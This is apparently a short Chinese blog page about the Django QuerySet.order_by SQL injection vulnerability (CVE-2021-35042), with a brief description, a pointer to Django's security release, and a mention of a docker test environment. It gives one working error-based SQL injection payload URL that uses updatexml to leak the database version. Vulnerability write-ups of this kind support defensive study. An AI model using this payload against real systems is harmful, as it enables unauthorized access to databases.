当前位置: 首页 > article >正文

Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

article 2024/11/19 4:41:51

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

 


http://www.kler.cn/a/147088.html

相关文章:

  • 2024-11-17 -MATLAB三维绘图简单实例
  • 【C语言】科技要闻。
  • 【MySQL】优化方向+表连接
  • PCB+SMT线上报价系统+PCB生产ERP系统自动化拼板模块升级
  • 微服务即时通讯系统的实现(客户端)----(3)
  • 大模型论文精华-AI在医疗诊断、语言学习与情绪识别等领域的最新应用进展
  • vue3 解决各场景 loading过度-5中方法
  • [ BUG ] 踩坑 Axios Delete 请求传参
  • kafka入门(二): 位移提交
  • 3D点云目标检测:VoxelNex解读(带源码/未完)
  • 微软 Edge 浏览器目前无法支持 avif 格式
  • gitt开源项目的意义,公司为什么会对在gitt上有开源项目的人更大机会
  • 7 最大的以1为边界的正方形
  • Idea空白目录自动折叠的问题
  • 淘宝平台商品详情平台订单接入说明
  • Python实现FA萤火虫优化算法优化循环神经网络分类模型(LSTM分类算法)项目实战
  • 智慧工厂人员定位系统源码,融合位置物联网、GIS可视化等技术,实现对人员、物资精确定位管理
  • 【网络安全】-常见的网站攻击方式详解
  • Mysql的分库分表
  • 诺威信,浪潮云,微众区块链
  • 单片机学习4——中断的概念
  • 使用 Java 来读取 Excel 文件,检查每一行中的 URL,并将不符合条件的行标记为红色
  • 数据结构 / 顺序表操作 / 顺序表尾部删除
  • C语言进阶之笔试题详解(1)
  • 基于python的NBA球员数据可视化分析的设计与实现
  • EFCore乐观并发